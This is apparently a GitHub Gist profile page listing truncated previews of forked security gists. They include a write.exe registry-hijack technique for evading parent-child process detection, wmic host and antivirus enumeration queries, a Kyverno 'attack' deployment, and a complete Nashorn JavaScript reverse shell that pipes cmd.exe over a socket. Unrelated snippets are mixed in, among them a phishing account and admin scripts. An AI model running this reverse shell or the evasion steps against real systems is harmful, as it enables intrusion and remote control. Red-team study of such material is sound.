Benjamin-Yves Trapp BenjiTrapp

🏠
Working from home
View GitHub Profile
@BenjiTrapp
BenjiTrapp / README.md
Created June 20, 2025 05:03 — forked from mblzk/README.md
Proxying binary execution through write.exe

Write.exe is a wrapper binary for launching WordPad. Historically it launched Microsoft Write, a very basic word processor from the pre-2000 era, and it has been kept as a compatibility stub since Windows 95.

This binary reads the HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\wordpad.exe registry key to find WordPad's executable, and that key can be created by a regular user. This might be used to confuse detection/application control solutions that rely on parent-child process relationships, because the resulting process is spawned as a child of the Windows-signed (Signing Level 12) write.exe.

If one controls a domain, it is possible to use UNC paths to run remote binaries without dropping them to disk. This requires additional steps to bypass the security prompt.

tl;dr

I want to just run an exe

@BenjiTrapp
BenjiTrapp / wmic_cmds.txt
Created June 11, 2025 08:11 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@BenjiTrapp
BenjiTrapp / revsh.js
Created May 7, 2025 12:57 — forked from mosesrenegade/revsh.js
Nashorn Javascript Reverse Shell
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
#!/bin/bash
# Version number (adjust if a different version is needed)
ORACLE_VERSION="21_9" # Example: 21.9
ORACLE_BASE_URL="https://download.oracle.com/otn_software/linux/instantclient"
# Target directory
ORACLE_DIR="/opt/oracle"
INSTANT_CLIENT_DIR="$ORACLE_DIR/instantclient_$ORACLE_VERSION"

g.co, Google's official URL shortcut (update: or Google Workspace's domain verification, see bottom), is compromised. People are actively having their Google accounts stolen.

Someone just tried the most sophisticated phishing attack I've ever seen. I almost fell for it. My mind is a little blown.

  1. Someone named "Chloe" called me from 650-203-0000 with Caller ID saying "Google". She sounded like a real engineer, the connection was super clear, and she had an American accent. Screenshot.

  2. They said that they were from Google Workspace and someone had recently gained access to my account, which they had blocked. They asked me if I had recently logged in from Frankfurt, Germany and I said no.

  3. I asked if they can confirm this is Google calling by emailing me from a Google email and they said sure and sent me this email and told me to look for a case number in it, which I saw in

#!/bin/bash
# Fetch the list of all Compute instances and store it in an array.
# The value() format emits one tab-separated "name<TAB>zone" line per instance,
# so read line by line instead of word-splitting into the array.
mapfile -t instances < <(gcloud compute instances list --format="value(name,zone)")
# Check whether "privilegeduser:ssh-rsa" appears in the metadata of the instances
for instance_info in "${instances[@]}"; do
instance=$(echo "$instance_info" | cut -f1)
zone=$(echo "$instance_info" | cut -f2)
echo "Überprüfe Instanz: $instance in Zone: $zone"
#!/usr/bin/env python3
import logging
import sys
from subprocess import call
from os import environ, uname
from time import gmtime
user = environ.get("SUDO_USER", environ.get("USER"))
log_file = environ["LOG_HOME"] + "/.command_wrapper.log"
SVCIP="$(kubectl get svc -n kyverno kyverno-svc --output jsonpath='{.spec.clusterIP}')"
PODNAME="$(kubectl get pod -n kyverno -l app.kubernetes.io/component=admission-controller --output name | sed -e 's/^pod\///g')"
PODIP="$(kubectl get pod -n kyverno $PODNAME --output jsonpath='{.status.podIP}')"
kubectl apply -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
name: attack
spec:
@BenjiTrapp
BenjiTrapp / Create new user in Linux
Created December 1, 2024 14:59 — forked from wyyder/Create new user in Linux
To create a new user with sudo permission in Kali Linux
# Add user.
useradd -m username
# -m creates a home directory for the user.
# Set Password.
passwd username
# Set user group to sudo.
usermod -a -G sudo username
# -a appends the user to the group and '-G sudo' names the sudo group to add the user to.